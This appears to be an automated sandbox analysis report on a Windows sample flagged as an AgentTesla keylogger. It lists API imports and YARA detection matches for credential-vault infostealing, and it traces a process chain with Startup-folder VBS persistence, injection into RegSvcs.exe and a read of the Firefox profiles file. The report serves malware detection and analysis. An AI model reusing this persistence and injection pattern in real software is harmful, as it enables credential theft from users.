Source: C:\Windows\System32\wscript.exe; COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe; Code function: 0_2_00E83633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_00E83633
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe; Code function: 0_2_00F0C27C ReleaseCapture,ChrCmpIA,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,0_2_00F0C27C
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe; Code function: 0_2_00F0C220 NtdllDialogWndProc_W,0_2_00F0C220
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe; Code function: 0_2_00F0C49C PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_00F0C49C
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe; Code function: 0_2_00F0C788 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_00F0C788
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe; Code function: 0_2_00F0C8EE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_00F0C8EE
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe; Code function: 0_2_00F0C86D SendMessageW,NtdllDialogWndProc_W,0_2_00F0C86D
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe; Code function: 0_2_00F0CBF9 NtdllDialogWndProc_W,0_2_00F0CBF9
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe; Code function: 0_2_00F0CBAE NtdllDialogWndProc_W,0_2_00F0CBAE
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe; Code function: 0_2_00F0CB7F NtdllDialogWndProc_W,0_2_00F0CB7F
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe; Code function: 0_2_00F0CB50 NtdllDialogWndProc_W,0_2_00F0CB50
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F0CC2E ClientToScreen,NtdllDialogWndProc_W,0_2_00F0CC2E
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F0CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00F0CDAC
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F0CD6C GetWindowLongW,NtdllDialogWndProc_W,0_2_00F0CD6C
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E81287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,745EC8D0,NtdllDialogWndProc_W,0_2_00E81287
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E81290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,0_2_00E81290
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E816DE GetParent,NtdllDialogWndProc_W,0_2_00E816DE
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F0D6C6 NtdllDialogWndProc_W,0_2_00F0D6C6
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E816B5 NtdllDialogWndProc_W,0_2_00E816B5
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E8167D NtdllDialogWndProc_W,0_2_00E8167D
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F0D74C GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,0_2_00F0D74C
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E8189B NtdllDialogWndProc_W,0_2_00E8189B
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F0DA9A NtdllDialogWndProc_W,0_2_00F0DA9A
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F0BF4D NtdllDialogWndProc_W,CallWindowProcW,0_2_00F0BF4D
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_00553633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,1_2_00553633
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DC27C ReleaseCapture,ChrCmpIA,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,1_2_005DC27C
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DC220 NtdllDialogWndProc_W,1_2_005DC220
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DC49C PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,1_2_005DC49C
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DC788 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,1_2_005DC788
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DC86D SendMessageW,NtdllDialogWndProc_W,1_2_005DC86D
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DC8EE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,1_2_005DC8EE
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DCB50 NtdllDialogWndProc_W,1_2_005DCB50
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DCB7F NtdllDialogWndProc_W,1_2_005DCB7F
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DCBF9 NtdllDialogWndProc_W,1_2_005DCBF9
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DCBAE NtdllDialogWndProc_W,1_2_005DCBAE
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DCC2E ClientToScreen,NtdllDialogWndProc_W,1_2_005DCC2E
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DCD6C GetWindowLongW,NtdllDialogWndProc_W,1_2_005DCD6C
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DCDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_005DCDAC
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_00551290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,1_2_00551290
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_00551287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,745EC8D0,NtdllDialogWndProc_W,1_2_00551287
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0055167D NtdllDialogWndProc_W,1_2_0055167D
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005516DE GetParent,NtdllDialogWndProc_W,1_2_005516DE
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DD6C6 NtdllDialogWndProc_W,1_2_005DD6C6
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005516B5 NtdllDialogWndProc_W,1_2_005516B5
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DD74C GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,1_2_005DD74C
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0055189B NtdllDialogWndProc_W,1_2_0055189B
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DDA9A NtdllDialogWndProc_W,1_2_005DDA9A
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DBF4D NtdllDialogWndProc_W,CallWindowProcW,1_2_005DBF4D
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EE40B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_00EE40B1
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00ED8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,746D5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,0_2_00ED8858
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EE545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00EE545F
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005B545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_005B545F
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EADBB50_2_00EADBB5
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E8E0600_2_00E8E060
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F0804A0_2_00F0804A
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E941400_2_00E94140
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EA24050_2_00EA2405
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EB65220_2_00EB6522
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EB267E0_2_00EB267E
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F006650_2_00F00665
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E968430_2_00E96843
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EA283A0_2_00EA283A
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E8E8000_2_00E8E800
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EB89DF0_2_00EB89DF
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F00AE20_2_00F00AE2
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EB6A940_2_00EB6A94
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E98A0E0_2_00E98A0E
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EDEB070_2_00EDEB07
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EE8B130_2_00EE8B13
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EACD610_2_00EACD61
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EB70060_2_00EB7006
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E931900_2_00E93190
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E9710E0_2_00E9710E
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E812870_2_00E81287
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EA33C70_2_00EA33C7
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EAF4190_2_00EAF419
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EA16C40_2_00EA16C4
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E956800_2_00E95680
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E958C00_2_00E958C0
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EA78D30_2_00EA78D3
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EA1BB80_2_00EA1BB8
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EB9D050_2_00EB9D05
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E8FE400_2_00E8FE40
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EABFE60_2_00EABFE6
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EA1FD00_2_00EA1FD0
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_011934380_2_01193438
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0057DBB51_2_0057DBB5
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005D804A1_2_005D804A
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0055E0601_2_0055E060
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005641401_2_00564140
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005724051_2_00572405
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005865221_2_00586522
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0058267E1_2_0058267E
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005D06651_2_005D0665
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005668431_2_00566843
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0055E8001_2_0055E800
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0057283A1_2_0057283A
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005889DF1_2_005889DF
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_00568A0E1_2_00568A0E
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005D0AE21_2_005D0AE2
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_00586A941_2_00586A94
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005B8B131_2_005B8B13
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005AEB071_2_005AEB07
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0057CD611_2_0057CD61
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005870061_2_00587006
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0056710E1_2_0056710E
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005631901_2_00563190
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005512871_2_00551287
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005733C71_2_005733C7
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0057F4191_2_0057F419
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005716C41_2_005716C4
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005656801_2_00565680
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005778D31_2_005778D3
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005658C01_2_005658C0
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_00571BB81_2_00571BB8
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_00589D051_2_00589D05
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0055FE401_2_0055FE40
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_00571FD01_2_00571FD0
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0057BFE61_2_0057BFE6
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_00FE2E601_2_00FE2E60
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: String function: 00EA0D27 appears 70 times
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: String function: 00EA8B40 appears 42 times
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: String function: 00E87F41 appears 35 times
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: String function: 00570D27 appears 70 times
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: String function: 00578B40 appears 42 times
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: String function: 00557F41 appears 35 times
                    Source: LfZAz7DQzo.exeStatic PE information: Resource name: RT_STRING type: COM executable for DOS
                    Source: troopwise.exe.0.drStatic PE information: Resource name: RT_STRING type: COM executable for DOS
                    Source: LfZAz7DQzo.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 1.2.troopwise.exe.1be0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 1.2.troopwise.exe.1be0000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 1.2.troopwise.exe.1be0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 1.2.troopwise.exe.1be0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 4.2.troopwise.exe.24c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 4.2.troopwise.exe.24c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 4.2.troopwise.exe.24c0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 4.2.troopwise.exe.24c0000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/6@2/2
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EEA2D5 GetLastError,FormatMessageW,0_2_00EEA2D5
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00ED8713 AdjustTokenPrivileges,CloseHandle,0_2_00ED8713
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00ED8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00ED8CC3
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005A8713 AdjustTokenPrivileges,CloseHandle,1_2_005A8713
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005A8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,1_2_005A8CC3
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EEB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00EEB59E
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EFF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00EFF121
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EF86D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00EF86D0
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E84FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00E84FE9
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeFile created: C:\Users\user\AppData\Local\seskinJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeFile created: C:\Users\user\AppData\Local\Temp\aut1A31.tmpJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbs"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: LfZAz7DQzo.exeReversingLabs: Detection: 71%
                    Source: LfZAz7DQzo.exeVirustotal: Detection: 61%
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeFile read: C:\Users\user\Desktop\LfZAz7DQzo.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\LfZAz7DQzo.exe "C:\Users\user\Desktop\LfZAz7DQzo.exe"
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeProcess created: C:\Users\user\AppData\Local\seskin\troopwise.exe "C:\Users\user\Desktop\LfZAz7DQzo.exe"
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\LfZAz7DQzo.exe"
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\seskin\troopwise.exe "C:\Users\user\AppData\Local\seskin\troopwise.exe"
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\seskin\troopwise.exe"
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeProcess created: C:\Users\user\AppData\Local\seskin\troopwise.exe "C:\Users\user\Desktop\LfZAz7DQzo.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\LfZAz7DQzo.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\seskin\troopwise.exe "C:\Users\user\AppData\Local\seskin\troopwise.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\seskin\troopwise.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: kernel.appcore.dllJump to behavior
